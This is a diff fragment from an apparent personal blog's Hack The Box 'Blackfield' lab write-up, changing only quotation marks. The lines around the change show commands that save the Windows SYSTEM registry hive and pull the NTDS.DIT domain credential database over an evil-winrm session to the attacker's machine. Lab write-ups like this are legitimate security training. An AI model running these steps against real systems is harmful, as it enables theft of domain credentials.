Vorkharium/vorkharium.github.io/_posts/2024-11-03-HTB-Blackfield-Write-up.md

 reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM
 ```

-And finally move the NTDS.DIT and SYSTEM files to our Kali using "download" on evil-winrm session:
+And finally move the NTDS.DIT and SYSTEM files to our Kali using download on evil-winrm session:
 ```shell
 download NTDS.DIT
 download SYSTEM